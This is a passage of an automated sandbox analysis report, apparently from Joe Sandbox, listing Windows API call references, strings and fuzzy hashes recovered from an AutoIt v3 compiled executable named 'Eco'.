                            • Part of subcall function 0052FE77: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051AC6B), ref: 0052FED2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051AD08
                          • OleInitialize.OLE32(00000000), ref: 0051AD85
                          • CloseHandle.KERNEL32(00000000), ref: 00552E86
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID: <g]$\d]$c]
                          • API String ID: 1986988660-1543504256
                          • Opcode ID: f773520aed3b6878f3e866fd91dd39d0b9ae12798feeb3a45e9421a2548c36e9
                          • Instruction ID: 992b1a8df9d10a0501ecb63a50e378979bcc9779cbf32129499c67c40fca0589
                          • Opcode Fuzzy Hash: f773520aed3b6878f3e866fd91dd39d0b9ae12798feeb3a45e9421a2548c36e9
                          • Instruction Fuzzy Hash: F281BCB09022458ECBA4DF79FA956197FE4FBA9308710852BD019C73A2EB71444EEF15

                          Control-flow Graph

                          • Control-flow graph image omitted; recoverable data from the text dump: a single block at 5250db to 52514b (graph node 1431) calling CreateWindowExW twice and ShowWindow twice. The Executed / Not Executed colouring of the graph is not recoverable.
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                          • ShowWindow.USER32(00000000), ref: 0052513E
                          • ShowWindow.USER32(00000000), ref: 00525147
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 8927907f5cb2ee1da862cbedcc12e3aae099c45e73484280ea880e3c61acb976
                          • Instruction ID: 752c8365c6c05f052ffd9104f185cda9c095afcd449f4544342bacb4469022dd
                          • Opcode Fuzzy Hash: 8927907f5cb2ee1da862cbedcc12e3aae099c45e73484280ea880e3c61acb976
                          • Instruction Fuzzy Hash: 06F0DA796522947EEA3157276C48E373F7DE7D7F50F00412BB900A31B0C6B51856EAB0
                          APIs
                            • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C4E
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C61
                          • _free.LIBCMT ref: 00579ACC
                          • _free.LIBCMT ref: 00579AD3
                          • _free.LIBCMT ref: 00579B3E
                            • Part of subcall function 00532EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EC9
                            • Part of subcall function 00532EB5: GetLastError.KERNEL32(00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EDB
                          • _free.LIBCMT ref: 00579B46
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 1552873950-2806939583
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                          • String ID:
                          • API String ID: 1559183368-0
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051534A
                          • TranslateMessage.USER32(?), ref: 00515356
                          • DispatchMessageW.USER32(?), ref: 00515360
                          Similarity
                          • API ID: Message$Peek$DispatchTranslate
                          • String ID:
                          • API String ID: 1795658109-0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575688
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575696
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0057569E
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005756A8
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005756E4
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112A8
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112C9
                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112EB
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          APIs
                            • Part of subcall function 0053586C: __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053586C: __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          • std::exception::exception.LIBCMT ref: 00530F4C
                          • __CxxThrowException@8.LIBCMT ref: 00530F61
                            • Part of subcall function 005386FB: RaiseException.KERNEL32(?,?,?,005CAE78,?,?,?,?,?,00530F66,?,005CAE78,?,00000001), ref: 00538750
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: `=Z$h=Z
                          • API String ID: 3902256705-1415512615
                          APIs
                          • _memset.LIBCMT ref: 00525B58
                            • Part of subcall function 005256F8: _memset.LIBCMT ref: 00525787
                            • Part of subcall function 005256F8: _wcscpy.LIBCMT ref: 005257DB
                            • Part of subcall function 005256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                          • KillTimer.USER32(?,00000001,?,?), ref: 00525BAD
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00525BBC
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00560CFC
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          APIs
                            • Part of subcall function 005249C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                          • _free.LIBCMT ref: 0055FA84
                          • _free.LIBCMT ref: 0055FACB
                            • Part of subcall function 005229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                          Strings
                          • Bad directive syntax error, xrefs: 0055FAB3
                          Similarity
                          • API ID: _free$CurrentDirectoryLibraryLoad
                          • String ID: Bad directive syntax error
                          • API String ID: 2861923089-2118420937
                          Similarity
                          • API ID: _memmove
                          • String ID: AU3! ?Z$EA06
                          • API String ID: 4104443479-1020467815
                          APIs
                            • Part of subcall function 00524AB2: __fread_nolock.LIBCMT ref: 00524AD0
                          • _wcscmp.LIBCMT ref: 00579C4E
                          • _wcscmp.LIBCMT ref: 00579C61
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          APIs
                          • _memset.LIBCMT ref: 005602AB
                          • GetOpenFileNameW.COMDLG32(?), ref: 005602F5
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 005308F0: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0053090F
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen_memset
                          • String ID: X
                          • API String ID: 3777226403-3081909835
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          • _memset.LIBCMT ref: 005259F9
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00525ABB
                          Similarity
                          • API ID: IconNotifyShell_$_memset
                          • String ID:
                          • API String ID: 1505330794-0
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053A2CB: __NMSG_WRITE.LIBCMT ref: 0053A2F2
                            • Part of subcall function 0053A2CB: __NMSG_WRITE.LIBCMT ref: 0053A2FC
                          • __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053A328: GetModuleFileNameW.KERNEL32(00000000,005D43BA,00000104,00000004,00000001,00530F33), ref: 0053A3BA
                            • Part of subcall function 0053A328: ___crtMessageBoxW.LIBCMT ref: 0053A468
                            • Part of subcall function 00533201: ___crtCorExitProcess.LIBCMT ref: 00533207
                            • Part of subcall function 00533201: ExitProcess.KERNEL32 ref: 00533210
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          APIs
                          • _free.LIBCMT ref: 00579143
                            • Part of subcall function 00532EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EC9
                            • Part of subcall function 00532EB5: GetLastError.KERNEL32(00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EDB
                          • _free.LIBCMT ref: 00579154
                          • _free.LIBCMT ref: 00579166
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          APIs
                          • _strcat.LIBCMT ref: 0058DFD4
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • _wcscpy.LIBCMT ref: 0058E063
                          Similarity
                          • API ID: __itow__swprintf_strcat_wcscpy
                          • String ID:
                          • API String ID: 1012013722-0
                          APIs
                          • _memmove.LIBCMT ref: 00576759
                          • _memmove.LIBCMT ref: 00576777
                            • Part of subcall function 005768E0: _memmove.LIBCMT ref: 0057696E
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00575FBB
                          Similarity
                          • API ID: BuffCharLower
                          • String ID:
                          • API String ID: 2358735015-0
                          APIs
                          • IsThemeActive.UXTHEME ref: 00525FEF
                            • Part of subcall function 005334CE: __lock.LIBCMT ref: 005334D4
                            • Part of subcall function 005334CE: DecodePointer.KERNEL32(00000001,?,00526004,00568675), ref: 005334E0
                            • Part of subcall function 005334CE: EncodePointer.KERNEL32(?,?,00526004,00568675), ref: 005334EB
                            • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00525F18
                            • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00525F2D
                            • Part of subcall function 00525240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                            • Part of subcall function 00525240: IsDebuggerPresent.KERNEL32 ref: 0052527E
                            • Part of subcall function 00525240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                            • Part of subcall function 00525240: SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0052602F
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                          • String ID:
                          • API String ID: 1438897964-0
                          APIs
                          Similarity
                          • API ID: __lock_file_memset
                          • String ID:
                          • API String ID: 26237723-0
                          APIs
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • __lock_file.LIBCMT ref: 0053553B
                            • Part of subcall function 00536D6E: __lock.LIBCMT ref: 00536D91
                          • __fclose_nolock.LIBCMT ref: 00535546
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          APIs
                          • __lock_file.LIBCMT ref: 00535DE4
                          • __ftell_nolock.LIBCMT ref: 00535DEF
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          Similarity
                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                          • String ID:
                          • API String ID: 2999321469-0
                          APIs
                          • _memset.LIBCMT ref: 00525AEF
                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00525B1F
                          Similarity
                          • API ID: IconNotifyShell__memset
                          • String ID:
                          • API String ID: 928536360-0
                          APIs
                          • ___crtCorExitProcess.LIBCMT ref: 00533207
                            • Part of subcall function 005331CD: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0053320C,00530F33,?,00539E1E,000000FF,0000001E,005CB1A8,00000008,00539D82,00530F33,00530F33), ref: 005331DC
                            • Part of subcall function 005331CD: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005331EE
                          • ExitProcess.KERNEL32 ref: 00533210
                          Similarity
                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                          • String ID:
                          • API String ID: 2427264223-0
                          Similarity
                          • API ID: LoadString$__swprintf
                          • String ID:
                          • API String ID: 207118244-0
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          APIs
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          APIs
                            • Part of subcall function 00524B29: FreeLibrary.KERNEL32(00000000,?), ref: 00524B63
                            • Part of subcall function 005353AB: __wfsopen.LIBCMT ref: 005353B6
                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                            • Part of subcall function 00524ADE: FreeLibrary.KERNEL32(00000000), ref: 00524B18
                            • Part of subcall function 005248B0: _memmove.LIBCMT ref: 005248FA
                          Similarity
                          • API ID: Library$Free$Load__wfsopen_memmove
                          • String ID:
                          • API String ID: 1396898556-0
                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 2a590e5762171525bedf6b4b13435a70ba95dc5a73ed601039c942730dbba523
                          • Instruction ID: 7f080e287351c2b2a0e453b1a93b932b261a73df582005ead9e559f464d8d1bb
                          • Opcode Fuzzy Hash: 2a590e5762171525bedf6b4b13435a70ba95dc5a73ed601039c942730dbba523
                          • Instruction Fuzzy Hash: 43210574508301DFDB25DF54C458B9ABBE1BF89304F05896CF88A57362D731E889DB92
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 74da934b7bf074180758811dbad9ff6e3ea80466ae56d315e44f0c1284b13edb
                          • Instruction ID: 3f8ad992f1890965d1760a719ffada18fc43101a6e88b5cc88b95968b42b0420
                          • Opcode Fuzzy Hash: 74da934b7bf074180758811dbad9ff6e3ea80466ae56d315e44f0c1284b13edb
                          • Instruction Fuzzy Hash: 2001DB722017126ED3245B28DC06A677FA8BF447A0F10892DF51ACA1D1DB71E4408B94
                          APIs
                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0058477C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: EnvironmentVariable
                          • String ID:
                          • API String ID: 1431749950-0
                          • Opcode ID: 16401c42dbe79971c3bca48643a4778736c3e485acfb063488b4665befb673bd
                          • Instruction ID: 968963db98b3837e8e7490a60a109de3fa03262ba25ad2803524c5d66c041f06
                          • Opcode Fuzzy Hash: 16401c42dbe79971c3bca48643a4778736c3e485acfb063488b4665befb673bd
                          • Instruction Fuzzy Hash: 85F036356082056F9B15FB55D84AC9F7FB8FF95320B004156F40597291DF70A941DBA1
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • _memset.LIBCMT ref: 00577B21
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Exception@8Throw_memsetstd::exception::exception
                          • String ID:
                          • API String ID: 525207782-0
                          • Opcode ID: c34491c4572dc16e51a14d0fcf010cac5864f028c0566f866116d8912fde49fb
                          • Instruction ID: dce4dec235c5792f35fc0e3c2ee1029d650459113dfac40e1c82ead0e59ce338
                          • Opcode Fuzzy Hash: c34491c4572dc16e51a14d0fcf010cac5864f028c0566f866116d8912fde49fb
                          • Instruction Fuzzy Hash: 3301D2742042059FD325EF58E455B01BBE1BF99310F24849AE5888B3A2DA72E8408F90
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • _memmove.LIBCMT ref: 0054DBBB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Exception@8Throw_memmovestd::exception::exception
                          • String ID:
                          • API String ID: 1602317333-0
                          • Opcode ID: 9c4b4b06b97a342b372b4b1ca5fb652688e856bb2ce843847531830677b80c8a
                          • Instruction ID: 816b1e97a328b488037f50d00ef6f3b9e9f55dfb3f3f3d0eb24e7b8c5f362e57
                          • Opcode Fuzzy Hash: 9c4b4b06b97a342b372b4b1ca5fb652688e856bb2ce843847531830677b80c8a
                          • Instruction Fuzzy Hash: EEF0A974600202DFE725DF68C995A11BFE1BF59304F24949CE5898B3A2E732E851CF92
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _fseek
                          • String ID:
                          • API String ID: 2937370855-0
                          • Opcode ID: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                          • Instruction ID: ac479d50dca190e89c5af5351a6365bb16a93e00f9701ee01436841703ec4e7c
                          • Opcode Fuzzy Hash: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                          • Instruction Fuzzy Hash: 83F052B6400218BFCF108F84EC04DABBF7AEB85320F004498F9045A210E232EA21CBA0
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,005227AF,?,00000001), ref: 00524A63
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: fe3ae816fad952c9d5ab4ed41325f762a20aad53b58b62c896097a06381dad14
                          • Instruction ID: 389f4b029f37c5e15c020dcc64147f7b5335405fea8e6ad836c206760a17643b
                          • Opcode Fuzzy Hash: fe3ae816fad952c9d5ab4ed41325f762a20aad53b58b62c896097a06381dad14
                          • Instruction Fuzzy Hash: 41F01571145722CFCB349F64E894816BFF2BF16326320992EE5D783650C7319884DF54
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                          • Instruction ID: 70a0c37161ed637eb1f72ac36ccfb4219e95ccd39994efa330cff996bfb77fbd
                          • Opcode Fuzzy Hash: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                          • Instruction Fuzzy Hash: 65F0F87240020DFFDF05CF90C945EAABB79FF14314F208589F9148B251D336DA61AB91
                          APIs
                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0053090F
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LongNamePath_memmove
                          • String ID:
                          • API String ID: 2514874351-0
                          • Opcode ID: 0982225da247ed641ac74f99b220854cf7b226ce6b7db6f47e3ecb81ad6c5ad2
                          • Instruction ID: 4b74a06996cd38c2994b58dc549b14ae79c52af95db1dfd30d524c1b8fc6988c
                          • Opcode Fuzzy Hash: 0982225da247ed641ac74f99b220854cf7b226ce6b7db6f47e3ecb81ad6c5ad2
                          • Instruction Fuzzy Hash: 08E08632A001295BC721D6989C09FEA77DDEFC9790F0401B6FC09D7244D9605C8186D5
                          APIs
                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00573CEA,?,?,?), ref: 00573D7A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
